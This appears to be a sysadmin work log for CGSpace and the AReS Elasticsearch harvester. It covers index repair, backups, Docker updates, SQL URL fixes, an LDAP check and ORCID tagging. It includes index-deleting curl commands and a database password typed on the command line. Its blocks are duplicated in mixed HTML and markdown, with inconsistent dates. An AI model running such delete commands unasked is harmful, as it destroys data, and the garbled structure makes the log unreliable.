$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</code></pre></div><h2 id="2021-05-10">2021-05-10</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-temp-backup
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</span></span></code></pre></div><h2 id="2021-05-10">2021-05-10</h2>
<ul>
<li>Amazing, the harvesting on AReS finished but it messed up all the indexes and now there are no items in any index!</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
yellow open openrxv-items-temp 8thRX0WVRUeAzmd2hkG6TA 1 1 0 0 283b 283b
yellow open openrxv-items-temp-backup _0tyvctBTg2pjOlcoVP1LA 1 1 104165 20134 305.5mb 305.5mb
yellow open openrxv-items-final BtvV9kwVQ3yBYCZvJS1QyQ 1 1 0 0 283b 283b
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
</span></span><span style="display:flex;"><span>yellow open openrxv-items-temp 8thRX0WVRUeAzmd2hkG6TA 1 1 0 0 283b 283b
</span></span><span style="display:flex;"><span>yellow open openrxv-items-temp-backup _0tyvctBTg2pjOlcoVP1LA 1 1 104165 20134 305.5mb 305.5mb
</span></span><span style="display:flex;"><span>yellow open openrxv-items-final BtvV9kwVQ3yBYCZvJS1QyQ 1 1 0 0 283b 283b
</span></span></code></pre></div><ul>
- I fixed the indexes manually by re-creating them and cloning from the backup:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final&#39;</span>
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp-backup/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-temp-backup/_clone/openrxv-items-final
$ curl -s -X POST <span style="color:#e6db74">&#39;http://localhost:9200/_aliases&#39;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;</span>
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp-backup&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp-backup/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp-backup/_clone/openrxv-items-final
</span></span><span style="display:flex;"><span>$ curl -s -X POST <span style="color:#e6db74">&#39;http://localhost:9200/_aliases&#39;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp-backup&#39;</span>
</span></span></code></pre></div><ul>
- Also I ran all updates on the server and updated all Docker images, then rebooted the server (linode20):
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
</code></pre></div><ul>
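- The sed/cut pipeline above just joins the `REPOSITORY` and `TAG` columns into `repo:tag` pairs for `docker pull`; newer Docker can emit that directly with a Go template, which might be slightly more robust (a sketch, not what I ran here):

```console
$ docker images --format '{{.Repository}}:{{.Tag}}' | grep -v '<none>' | xargs -L1 docker pull
```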
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
</span></span></code></pre></div><ul>
- I backed up the AReS Elasticsearch data using elasticdump, then started a new harvest:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_mapping.json --type<span style="color:#f92672">=</span>mapping
$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_data.json --type<span style="color:#f92672">=</span>data --limit<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span>
</code></pre></div><ul>
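- elasticdump writes one JSON document per line by default, so a rough sanity check on the backup is just counting lines and eyeballing the file size (a sketch; assumes the default newline-delimited output):

```console
$ wc -l /home/aorth/openrxv-items_data.json
$ du -sh /home/aorth/openrxv-items_data.json
```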
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_mapping.json --type<span style="color:#f92672">=</span>mapping
</span></span><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_data.json --type<span style="color:#f92672">=</span>data --limit<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span>
</span></span></code></pre></div><ul>
- Discuss CGSpace statistics with the CIP team
  - They were wondering why their numbers for 2020 were so low
- I checked the CLARISA list against ROR's April, 2021 release ("Version 9", on figshare, though it is version 8 in the dump):
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/ror-lookup.py -i /tmp/clarisa-institutions.txt -r ror-data-2021-04-06.json -o /tmp/clarisa-ror-matches.csv
$ csvgrep -c matched -m <span style="color:#e6db74">&#39;true&#39;</span> /tmp/clarisa-ror-matches.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> | wc -l
1770
</code></pre></div><ul>
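- ror-lookup.py isn't shown here, but a crude approximation of the same check could be done with jq, assuming the ROR dump is a JSON array of records with a top-level `name` field (this ignores the aliases and labels the script might also match, so it would undercount):

```console
$ jq -r '.[].name' ror-data-2021-04-06.json | sort -u > /tmp/ror-names.txt
$ grep -Fxf /tmp/ror-names.txt /tmp/clarisa-institutions.txt | wc -l
```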
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/ror-lookup.py -i /tmp/clarisa-institutions.txt -r ror-data-2021-04-06.json -o /tmp/clarisa-ror-matches.csv
</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m <span style="color:#e6db74">&#39;true&#39;</span> /tmp/clarisa-ror-matches.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> | wc -l
</span></span><span style="display:flex;"><span>1770
</span></span></code></pre></div><ul>
- With 1770 out of 6230 matched, that's 28.4%…
- I sent an email to Hector Tobon to point out the issues in CLARISA again and ask him to chat
- Meeting with GARDIAN developers about CG Core and how GARDIAN works
- Fix a few thousand IWMI URLs that are using HTTP instead of HTTPS on CGSpace:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;http://www.iwmi.cgiar.org&#39;,&#39;https://www.iwmi.cgiar.org&#39;, &#39;g&#39;) WHERE text_value LIKE &#39;http://www.iwmi.cgiar.org%&#39; AND metadata_field_id=219;
UPDATE 1132
localhost/dspace63= &gt; UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;http://publications.iwmi.org&#39;,&#39;https://publications.iwmi.org&#39;, &#39;g&#39;) WHERE text_value LIKE &#39;http://publications.iwmi.org%&#39; AND metadata_field_id=219;
UPDATE 1803
</code></pre></div><ul>
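- A quick way to confirm nothing was missed afterwards is to count any remaining HTTP values in the same field (a sketch against the same table and field ID as above):

```console
localhost/dspace63= > SELECT COUNT(*) FROM metadatavalue WHERE text_value LIKE 'http://www.iwmi.cgiar.org%' AND metadata_field_id=219;
localhost/dspace63= > SELECT COUNT(*) FROM metadatavalue WHERE text_value LIKE 'http://publications.iwmi.org%' AND metadata_field_id=219;
```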
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;http://www.iwmi.cgiar.org&#39;,&#39;https://www.iwmi.cgiar.org&#39;, &#39;g&#39;) WHERE text_value LIKE &#39;http://www.iwmi.cgiar.org%&#39; AND metadata_field_id=219;
</span></span><span style="display:flex;"><span>UPDATE 1132
</span></span><span style="display:flex;"><span>localhost/dspace63= &gt; UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;http://publications.iwmi.org&#39;,&#39;https://publications.iwmi.org&#39;, &#39;g&#39;) WHERE text_value LIKE &#39;http://publications.iwmi.org%&#39; AND metadata_field_id=219;
</span></span><span style="display:flex;"><span>UPDATE 1803
</span></span></code></pre></div><ul>
- In the case of the latter, the HTTP links don't even work! The web server returns HTTP 404 unless the request is HTTPS
- IWMI also says that their subjects are a subset of AGROVOC so they no longer want to use `cg.subject.iwmi` for their subjects
- I have to fix the Elasticsearch indexes on AReS after last week's harvesting because, as always, the `openrxv-items` index should be an alias of `openrxv-items-final` instead of `openrxv-items-temp`:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool
&#34;openrxv-items-final&#34;: {
&#34;aliases&#34;: {}
},
&#34;openrxv-items-temp&#34;: {
&#34;aliases&#34;: {
&#34;openrxv-items&#34;: {}
}
},
...
</code></pre></div><ul>
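- For reference, the alias could also be moved atomically with a single `_aliases` call that removes and adds in one action list (a sketch; only appropriate when `openrxv-items-final` already holds the current data):

```console
$ curl -s -X POST 'http://localhost:9200/_aliases' -H 'Content-Type: application/json' -d'{"actions": [{"remove": {"index": "openrxv-items-temp", "alias": "openrxv-items"}}, {"add": {"index": "openrxv-items-final", "alias": "openrxv-items"}}]}'
```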
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool
</span></span><span style="display:flex;"><span> &#34;openrxv-items-final&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {}
</span></span><span style="display:flex;"><span> },
</span></span><span style="display:flex;"><span> &#34;openrxv-items-temp&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {
</span></span><span style="display:flex;"><span> &#34;openrxv-items&#34;: {}
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span> },
</span></span><span style="display:flex;"><span>...
</span></span></code></pre></div><ul>
- I took a backup of the `openrxv-items` index with elasticdump so I can re-create the indexes manually before starting a new harvest tomorrow:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_mapping.json --type<span style="color:#f92672">=</span>mapping
$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_data.json --type<span style="color:#f92672">=</span>data --limit<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span>
</code></pre></div><h2 id="2021-05-16">2021-05-16</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_mapping.json --type<span style="color:#f92672">=</span>mapping
</span></span><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_data.json --type<span style="color:#f92672">=</span>data --limit<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span>
</span></span></code></pre></div><h2 id="2021-05-16">2021-05-16</h2>
- I deleted and re-created the Elasticsearch indexes on AReS:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final&#39;</span>
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
$ curl -XPUT <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final&#39;</span>
$ curl -XPUT <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
$ curl -s -X POST <span style="color:#e6db74">&#39;http://localhost:9200/_aliases&#39;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -XPUT <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -XPUT <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST <span style="color:#e6db74">&#39;http://localhost:9200/_aliases&#39;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;</span>
</span></span></code></pre></div><ul>
- Then I re-imported the backup that I created with elasticdump yesterday:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ elasticdump --input<span style="color:#f92672">=</span>/home/aorth/openrxv-items_mapping.json --output<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items-final --type<span style="color:#f92672">=</span>mapping
$ elasticdump --input<span style="color:#f92672">=</span>/home/aorth/openrxv-items_data.json --output<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items-final --type<span style="color:#f92672">=</span>data --limit<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>/home/aorth/openrxv-items_mapping.json --output<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items-final --type<span style="color:#f92672">=</span>mapping
</span></span><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>/home/aorth/openrxv-items_data.json --output<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items-final --type<span style="color:#f92672">=</span>data --limit<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span>
</span></span></code></pre></div><ul>
- Then I started a new harvest on AReS

## 2021-05-17
- The AReS harvest finished and the Elasticsearch indexes seem OK so I shouldn't have to fix them next time…
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
yellow open openrxv-items-temp o3ijJLcyTtGMOPeWpAJiVA 1 1 0 0 283b 283b
yellow open openrxv-items-final TrJ1Ict3QZ-vFkj-4VcAzw 1 1 104317 0 259.4mb 259.4mb
$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool
&#34;openrxv-items-temp&#34;: {
&#34;aliases&#34;: {}
},
&#34;openrxv-items-final&#34;: {
&#34;aliases&#34;: {
&#34;openrxv-items&#34;: {}
}
},
...
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
</span></span><span style="display:flex;"><span>yellow open openrxv-items-temp o3ijJLcyTtGMOPeWpAJiVA 1 1 0 0 283b 283b
</span></span><span style="display:flex;"><span>yellow open openrxv-items-final TrJ1Ict3QZ-vFkj-4VcAzw 1 1 104317 0 259.4mb 259.4mb
</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool
</span></span><span style="display:flex;"><span> &#34;openrxv-items-temp&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {}
</span></span><span style="display:flex;"><span> },
</span></span><span style="display:flex;"><span> &#34;openrxv-items-final&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {
</span></span><span style="display:flex;"><span> &#34;openrxv-items&#34;: {}
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span> },
</span></span><span style="display:flex;"><span>...
</span></span></code></pre></div><ul>
- Abenet said she and some others can't log into CGSpace
  - I tried the CGSpace LDAP account and it does indeed seem to be broken:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b <span style="color:#e6db74">&#34;dc=cgiarad,dc=org&#34;</span> -D <span style="color:#e6db74">&#34;cgspace-ldap@cgiarad.org&#34;</span> -W <span style="color:#e6db74">&#34;(sAMAccountName=aorth)&#34;</span>
Enter LDAP Password:
ldap_bind: Invalid credentials (49)
additional info: 80090308: LdapErr: DSID-0C090453, comment: AcceptSecurityContext error, data 532, v3839
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b <span style="color:#e6db74">&#34;dc=cgiarad,dc=org&#34;</span> -D <span style="color:#e6db74">&#34;cgspace-ldap@cgiarad.org&#34;</span> -W <span style="color:#e6db74">&#34;(sAMAccountName=aorth)&#34;</span>
</span></span><span style="display:flex;"><span>Enter LDAP Password:
</span></span><span style="display:flex;"><span>ldap_bind: Invalid credentials (49)
</span></span><span style="display:flex;"><span> additional info: 80090308: LdapErr: DSID-0C090453, comment: AcceptSecurityContext error, data 532, v3839
</span></span></code></pre></div><ul>
- I sent a message to Biruk so he can check the LDAP account
- IWMI confirmed that they do indeed want to move all their subjects to AGROVOC, so I made the changes in the XMLUI and config ([#467](https://github.com/ilri/DSpace/pull/467))
- Extract the CCAFS project tags from the submission form:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ xmllint --xpath <span style="color:#e6db74">&#39;//value-pairs[@value-pairs-name=&#34;ccafsprojectpii&#34;]/pair/stored-value/node()&#39;</span> dspace/config/input-forms.xml
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ xmllint --xpath <span style="color:#e6db74">&#39;//value-pairs[@value-pairs-name=&#34;ccafsprojectpii&#34;]/pair/stored-value/node()&#39;</span> dspace/config/input-forms.xml
</span></span></code></pre></div><ul>
- I formatted the input file with tidy, especially because one of the new project tags has an ampersand character… grrr:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ tidy -xml -utf8 -m -iq -w <span style="color:#ae81ff">0</span> dspace/config/input-forms.xml
line 3658 column 26 - Warning: unescaped &amp; or unknown entity &#34;&amp;WA_EU-IFAD&#34;
line 3659 column 23 - Warning: unescaped &amp; or unknown entity &#34;&amp;WA_EU-IFAD&#34;
</code></pre></div><ul>
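- Because of `-m`, tidy rewrites the file in place and escapes the bare ampersand as an `&amp;` entity, so a quick grep afterwards should find the escaped form (a sketch using the tag from the warnings above):

```console
$ grep -c '&amp;WA_EU-IFAD' dspace/config/input-forms.xml
```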
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ tidy -xml -utf8 -m -iq -w <span style="color:#ae81ff">0</span> dspace/config/input-forms.xml
</span></span><span style="display:flex;"><span>line 3658 column 26 - Warning: unescaped &amp; or unknown entity &#34;&amp;WA_EU-IFAD&#34;
</span></span><span style="display:flex;"><span>line 3659 column 23 - Warning: unescaped &amp; or unknown entity &#34;&amp;WA_EU-IFAD&#34;
</span></span></code></pre></div><ul>
- After testing whether this escaped value worked during submission, I created and merged a pull request to `6_x-prod` ([#468](https://github.com/ilri/DSpace/pull/468))

## 2021-05-18

- Paola from the Alliance emailed me some new ORCID identifiers to add to CGSpace
- I saved the new ones to a text file, combined them with the others, extracted the ORCID iDs themselves, and updated the names using `resolve-orcids.py`:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/new | grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> | sort | uniq &gt; /tmp/2021-05-18-combined.txt
$ ./ilri/resolve-orcids.py -i /tmp/2021-05-18-combined.txt -o /tmp/2021-05-18-combined-names.txt
</code></pre></div><ul>
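- The `[A-Z0-9]{4}` pattern is loose on purpose: ORCID iDs are four groups of four digits, except that the final character is a MOD 11-2 check character that can be `X`; a stricter pattern, if one ever needs to reject obvious garbage, would be (a sketch, not what I ran):

```console
$ grep -oE '[0-9]{4}-[0-9]{4}-[0-9]{4}-[0-9]{3}[0-9X]' /tmp/2021-05-18-combined.txt | sort -u
```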
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat ~/src/git/DSpace/dspace/config/controlled-vocabularies/cg-creator-identifier.xml /tmp/new | grep -oE <span style="color:#e6db74">&#39;[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}-[A-Z0-9]{4}&#39;</span> | sort | uniq &gt; /tmp/2021-05-18-combined.txt
</span></span><span style="display:flex;"><span>$ ./ilri/resolve-orcids.py -i /tmp/2021-05-18-combined.txt -o /tmp/2021-05-18-combined-names.txt
</span></span></code></pre></div><ul>
- I sorted the names and added the XML formatting in vim, then ran it through tidy:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ tidy -xml -utf8 -m -iq -w <span style="color:#ae81ff">0</span> dspace/config/controlled-vocabularies/cg-creator-identifier.xml
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ tidy -xml -utf8 -m -iq -w <span style="color:#ae81ff">0</span> dspace/config/controlled-vocabularies/cg-creator-identifier.xml
</span></span></code></pre></div><ul>
- Tag fifty-five items from the Alliance's new authors with ORCID iDs using `add-orcid-identifiers-csv.py`:
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ cat 2021-05-18-add-orcids.csv
dc.contributor.author,cg.creator.identifier
&#34;Urioste Daza, Sergio&#34;,Sergio Alejandro Urioste Daza: 0000-0002-3208-032X
&#34;Urioste, Sergio&#34;,Sergio Alejandro Urioste Daza: 0000-0002-3208-032X
&#34;Villegas, Daniel&#34;,Daniel M. Villegas: 0000-0001-6801-3332
&#34;Villegas, Daniel M.&#34;,Daniel M. Villegas: 0000-0001-6801-3332
&#34;Giles, James&#34;,James Giles: 0000-0003-1899-9206
&#34;Simbare, Alice&#34;,Alice Simbare: 0000-0003-2389-0969
&#34;Simbare, Alice&#34;,Alice Simbare: 0000-0003-2389-0969
&#34;Simbare, A.&#34;,Alice Simbare: 0000-0003-2389-0969
&#34;Dita Rodriguez, Miguel&#34;,Miguel Angel Dita Rodriguez: 0000-0002-0496-4267
&#34;Templer, Noel&#34;,Noel Templer: 0000-0002-3201-9043
&#34;Jalonen, R.&#34;,Riina Jalonen: 0000-0003-1669-9138
&#34;Jalonen, Riina&#34;,Riina Jalonen: 0000-0003-1669-9138
&#34;Izquierdo, Paulo&#34;,Paulo Izquierdo: 0000-0002-2153-0655
&#34;Reyes, Byron&#34;,Byron Reyes: 0000-0003-2672-9636
&#34;Reyes, Byron A.&#34;,Byron Reyes: 0000-0003-2672-9636
$ ./ilri/add-orcid-identifiers-csv.py -i /tmp/2021-05-18-add-orcids.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -d
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2021-05-18-add-orcids.csv
</span></span><span style="display:flex;"><span>dc.contributor.author,cg.creator.identifier
